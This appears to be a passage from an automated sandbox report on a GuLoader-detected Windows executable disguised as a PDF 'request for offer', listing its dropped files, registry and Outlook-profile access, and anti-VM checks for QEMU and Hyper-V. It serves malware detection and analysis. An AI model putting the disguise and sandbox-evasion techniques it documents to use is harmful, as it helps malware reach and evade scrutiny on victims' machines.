          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 5_2_0168157A NtProtectVirtualMemory,
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAsOpenFile.exeL vs REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeSection loaded: edgegdi.dll
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeSection loaded: edgegdi.dll
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeReversingLabs: Detection: 17%
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile read: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeJump to behavior
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess created: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\FolkedansensJump to behavior
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsf145.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/6@2/3
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00402104 CoCreateInstance,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BekvemmelighederJump to behavior
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: mshtml.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr
          Source: Binary string: mshtml.pdbUGP source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000001.54204236542.0000000000649000.00000008.00000001.01000000.00000006.sdmp
          Source: Binary string: D:\SourceCode\ScenarioProfile\production_V4.2\ScenarioProfileFrameWork\Service\ServiceSDK\Release\ScenarioProfilePlugIn\AsOpenFile.pdb,,)GCTL source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54386463779.00000000029B3000.00000004.00000800.00020000.00000000.sdmp, AsOpenFile.exe.2.dr

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.54201456373.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.54385682867.00000000007CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_10002DE0 push eax; ret
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D0730 push eax; retf
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D4DCE push eax; ret
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D46FC push ecx; iretd
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsq493.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile created: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exeJump to dropped file
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeFile opened: C:\Program Files\qga\qga.exe
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane\AsOpenFile.exeJump to dropped file
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_032D6F6D rdtsc
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00406555 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_0040287E FindFirstFileW,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeCode function: 2_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeSystem information queried: ModuleInformation
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exeAPI call chain: ExitProcess graph end node
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54391638858.00000000018E5000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54392074084.0000000001919000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000002.00000002.54388031494.0000000010059000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe, 00000005.00000002.54393846365.0000000003449000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
